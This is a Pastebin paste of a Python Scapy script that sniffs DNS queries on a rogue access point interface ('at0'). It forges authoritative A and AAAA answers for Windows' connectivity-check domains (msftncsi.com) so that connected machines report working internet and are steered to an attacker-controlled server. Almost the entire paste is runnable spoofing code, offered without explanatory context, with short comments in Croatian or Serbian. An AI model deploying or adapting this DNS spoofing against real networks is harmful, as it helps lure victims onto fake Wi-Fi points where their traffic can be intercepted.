Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from scapy.all import *
- DIR=os.path.dirname(os.path.abspath(__file__))
- print('Executed from '+DIR+'\n')
- print('Assuming interface at0')
- def FakeAccess2(pkt):
- pkt=pkt[0]
- if pkt.haslayer(DNSQR):
- print('Packet with DNSQR layer found.')
- if pkt[DNS].qd.qtype == 1:
- print('DNSQR type appears type = A')
- if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
- #MUST RETURN TRUE VALUE!
- print('It appears captured DNS request requests dns.msftncsi.com')
- spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
- IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
- UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
- DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
- an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='131.107.255.255'))
- del pkt[IP].chksum
- del pkt[UDP].chksum
- sendp(spoofed_pkt,iface='at0')
- print('Spoofed response send:')
- spoofed_pkt.show2()
- if 'www' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
- #MUST POINT TO SERVER WITH ncsi.txt; ISTO NARED ZA IPV6
- print('It appears captured DNS request requests www.msftncsi.com')
- spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
- IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
- UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
- DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
- # 10.0.0.254 mora bit GW nastiman za dhcp
- an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='10.0.0.254'))
- del pkt[IP].chksum
- del pkt[UDP].chksum
- sendp(spoofed_pkt,iface='at0')
- print('Spoofed response send:')
- spoofed_pkt.show2()
- else:
- print('Wrong DNS.qd.qname :'+pkt[DNS].qd.qname)
- if pkt[DNS].qd.qtype == 28:
- print('DNSQR type appears type = AAAA')
- if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
- #MUST RETURN TRUE VALUE
- print('AAAA DNS request for dns.msftncsi.com found, loop works')
- spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
- IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
- UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
- DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
- an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fd3e:4f5a:5b81::1'))
- del pkt[IP].chksum
- del pkt[UDP].chksum
- sendp(spoofed_pkt,iface='at0')
- print('Spoofed response send:')
- spoofed_pkt.show2()
- if 'dns' not in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
- #MUST RETURN TRUE VALUE
- print('AAAA DNS request for www.msftncsi.com found, loop works')
- spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
- IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
- UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
- DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
- an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fe80::ea94:f6ff:fe24:d147'))
- #RDATA JE IPV6 OD at0
- del pkt[IP].chksum
- del pkt[UDP].chksum
- sendp(spoofed_pkt,iface='at0')
- print('Spoofed response send:')
- spoofed_pkt.show2()
- else:
- print('Captured packet has no DNSQR')
- print('Sniffing...')
- sniff(filter='dst port 53',prn=FakeAccess2, store=0, count=0, iface='at0')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement